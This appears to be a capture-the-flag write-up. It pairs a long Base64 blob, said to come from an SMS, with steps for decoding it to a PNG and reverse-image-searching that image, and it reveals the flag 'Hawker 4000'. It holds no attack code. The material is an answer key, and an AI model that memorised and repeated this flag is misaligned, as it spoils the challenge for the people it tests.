X0Z1gNRuIezA8wnLxfDXRzcvmM+VAHxuCCxDATktea9iaeYD21bJCxXcJB7r7PzzBfNHG8+F0cIIRoViDQUejxJ4YVUHXj4+ixzWPldzv7G/0HI/ZrvvY7jJgpVEIE5McN7w0QIyfWiUro3wzUdYvA/fB2Fi28wH52amPj8rzr7cnTdaKGFqmx8P3gnUciygw65hKKoLbjTvIZ3mrvyR/pdZ6/nQNDLHzlyVL7i7PPmQxf/cLaX+Tk8A79w9h5nZ5jvk/i6LJ/ZyztFDCQIFQ9mWGaAd57v42cdYj4vJwxeEJDwHKIwBp7FH3FAauP68Bm/o7BFDuRvzHtDIYZX6rALIRqUtRyTeyi+IKZe4pjZQ+umLee4uA/H9Js4RuP528zniM+lM6CTYi1O9xlL0TaYYXzOFBKeRGH6SY6zEKJnmg8h48YeKUkXO/uh+Zx04/g9GAldbPcMbg9C1vvahhM1CAlFUUUuobgKeYnfNx8Cfrf5opNe3iUiFPxN8zl/p1BQQmAeyLtaiMjDeWeKu8WvWXoe5yTIT/ke72p/m2PbjuGAiO27ketfStEHgXosheIPuS0fMJ/gjUEH4ZW3mw9Fn+7snc6+zu/3Xh12IUSDspoCDiFZhGcR7bnU0sUl4yL7lHkvHlJ7EOl5igLuZhoE2QkcH3HTPt6G5jC2UxB2Z3EyxDRx+R05Ft+UuAY8w7E/CEps75spArsikYvQ9Ud4DdmW4/8aHfZRxODgoKx+7ABnK51t7KzD2WJn78ux/BRnzzt7E58/6OxUZ1s7W+bsfGddzk4c5nMPG/RcMsxymzpb4ewKZ085+5WzPZwtdNbpbKqz5c4+kmMdH3C2ytlMPn/S2RE69vVjQmOyrCD7hrMfO9ue4+jOOZb9IpeZ5ew6Z8dnWa7V2ePOdk28vq+zO7K852aOx+F5k7NXOrsoy/IfdHYTx25cJy7Psd2zuN3vcXaSs0/ouI8eU1JqfYFZUlDwsYzeu1vNh4+zAW/eyXyf0UP3AXolUQ19FEMYlw7zuSEBuiXXQqlUCmGHs7ht8CIiVxFh8R/zLvQcft4Ph/GYXkePJ7jefMseIYRoRDAOIzd7P3oX5+ZY9hE+TuN4+3CW5Xq43q3y8BxmY4CP2SZPQGEhGn/P5LY8kGNdT9EDiYgVOm+s0GEfPUgo1g/48SNP5c98foSzX0X/R8gXOYioHt48ev0mhg0243vxw38FB5qdyynC6G36GQcYJEX/xXyu4mU8lxAqvzB6CwbP3RmOmRa9DnF5MMMieO+upgauQojGZDHHZ6TdzLbcYVkUlqCVDkK4COk+PYwA3SrLdTtfsQgR2JVD/CEH8eW8XjyYa/jn9QVFkTNMoWcJRVETkGMIz15oWzPZ0k1V2yim8PxRDh6ha39IOMaPdz0HH9ylojLt4xy4hmN9tK58QHL0LL4POYeLKARxPj3OZcZSJKI6+llu82T+70kOlpvw7ruJd6lCCNFoPE0BhXHxomGWnUOBdhzHwfU5lkV++U6J1+AlHGcbzg9tWcQjrgOrsqwfnsZ/0pmw3LJ7NwNwEmCaQOSUL9RhHz2omKV+aOYPfV0k2jr4N0TUi9EPHmJsuqUnhk/xfzMpyLbmAITCl6O53EreBfZy3a38TNwJv5Z3jEhshjdySfR+EFolTKZAnUjxh2o9hJwRcnmA6wvnFPo8Phdt48ORGGyKBr0ebn+rTgEhRAOCgsKrOZb9fJhl+yjOUID4g2GWxU3+MRmEYrZr+dgM/8cN/c05PgOdKE519ifzntFcYJrAE81Hte7VYZdQFLUhriRAiAKVzQgHIO9lW96N9lIILokEWTMHlWN5d4vp91AZjfA12uyg8q6Ny8HC9E19FG0YINCq4U28axzkcuH/bbz7HKDYROuH25x9y9INuW+haEQbnsv5N8LhL0TbGYTnflwXPJETKBJbdPiFEA0IBOJJBSyPCRAQibk9D6GYnMZvDZ0J2aKBSaGIqE2uyRXQouxVNrw3MXANTUgoijoQi3+g4Q4VicPwzu3DgWB1JMDQkPtOijqEp9Ec+wr+L+QLBrEXBBlCF2jR0MH3LaeIwx3jJVwOoWEU1azkNnVHltzek/n3rzgIXkHxCZG6L9fdHA1G53GZ8HroPyaEECMdjKs/ymO55zlGb8Sb8yAE22hx2DrFcT4Wiu0c54ebaOE2HRIhodgYDFB0haIOiCrkI2LavDATSnI2lI+ZDwXsyufTMywT1h2meNqeQnApB6y1NtSTOYf/xwAzhX/jjjRbnss6CkIQeiJiLukP8K45hLjDoPZDrvf8SMT2WX5zSAshxGhhIcfm6ZFQ7OFNfDIfsZnXjv7otc34uEC7UpSCilnqh14KuvHRa2iyDc8hpubDHMpoTYAKYjRjxRRQaFWDHMTQjqHT0jmB/59zz/3fA/IL9zbvnXyEd6trLPMsLD0cpCBU51Nc7mKZk6XD9FXwVCKkjXxH5LD80XzoHJ+L8DKqnFGhjSbdCImvju568d5unQJCCDFkHEZkZufotW5LR4hiWiw9jV9gFsd7zXwlSkIexfoBd4JPUvjdEYkwTOuEhGZ46N7A1zEg3E4hGQvDyZnE/9ln/8+DtzWFX1eB24VBBsnayJHE7CpPZxjM4tAxvI8oiLnAfK/E8HkQk8hj/JoNba1wiHlvpfpyCSHEUJ6ic+CKaLxtsg1zujt4Ix+P75j5ZY52oZBQHFkgdw9etx/a0ATkq2hmG+ahxCLx5RR1yQEEIhFeyVKm3UBrHrRqQHL1ouh1rHNzWsibhLfwlMQAti7Lek9z9h1TjqIQQiRB3viB0fM+y9wlAs97E0IRHsX/aheKUlHoub5AhTNmLck1G0u29ghnU/hvm3gd+S3PlygSA7g7nZZ4bTztc1nesz6HSHwd87HXohhMgoFMcmhOKApVunxUIRUak4hWcb890zhJBQHGF8lD/wnxbwHkzhhwaux5vPZ+mM/lfO/L8u29ALDS8jmswiLP7+AtaFsAhmZTnXVMgihBCZeC7xvJfjeWfideR6pywdmYGQRMrRk9qFQkJx5IGcwMPM97b6JQVVtuntUCRyhrOvOnuH+TwWHNNDomVQjLKj+dBwc3IFLHTJB3gNkSvzYuJ15CN+23zzbTyex+3KBlo9oFr7VmffMx9qF0IIsSFI50Fe4iQ+Dx0sxiWWa7OhxSwzzXsY52gXilJRjmJ9gh838g2Rq4heiqGf4QIOEineLaIaGSFlVBqHeTqRy4i8v+v5HPmCqHLekmIRQuT1p/9tnDbstEfk4P37cs+h+qqNFGB/mLT1Og/ti8d/FeDnKhXQNC1mHWGLyGNjp/1qEWQoisIIqDQj8UEt7H1zJ5FDs4roYUI/TcRS75Ou1CIaE4csHg8B4KtU34OIF3lmtoL9qGVcjfNN+D8dWW9tZBXCIE0URxFwu44cCdKSrvMvVRRBHKXyydN4nPhYcR4WjkSk7nAAax+ii3F+0entPhFUKIvJjHMTUIxX7bMEdxog1NMdrdVMgiJBRHDSutsD5YaMyKEPBHbcOw7gAFKIRnPk1Yw13rEJGYSqVscHAQ+YjwUn43w/ueoAkhhCiNFykUA90ZhCLG6rXRcyz/B+06UQ6UozgygUDEvM3HQ9QleJ4CL5+bBOQ2zk2+6EQiQtEIMd+ZGJyEEEKUl2TTbYSTJyaWQWV0mP0KY/sW5lOOhCiZIBYwkwZ6LqWyLDOuzJ+bosDIVe06aNlbugzy/QOJbR5IfEaYti6VeK/xf73R/5Kvx8v3cz0xvYn3D/BOb5CvDWZ4T7XAZ8NjeKETdQgz35zYbuQUIoflwRzbiGkB4cl8KfH6prxTXWC1qVZujfZvmKEgPr5t0Q0QlmnhOdyUWKYtOk/Cujr5PJVhEB4THdv4nMH2tOdxA9bK9Qzm+E1U6lzI9zeJlIDrrDytlIQQ5WGO+U4YGIP6OCYncxTHWbrieUuOe7O160S5hOLnzc+g8VeeaIMZhNpgwmJRlnw9leEClEr8Hb

The SMS contains a large chunk of encoded data
Decoding it with Base64 actually produces a png file


Yes, there is an image here, it has a transparent background and white lines, right click to download


Performing a google image search with that png will give you the flag "Hawker 4000"

Cheers,
thegrayone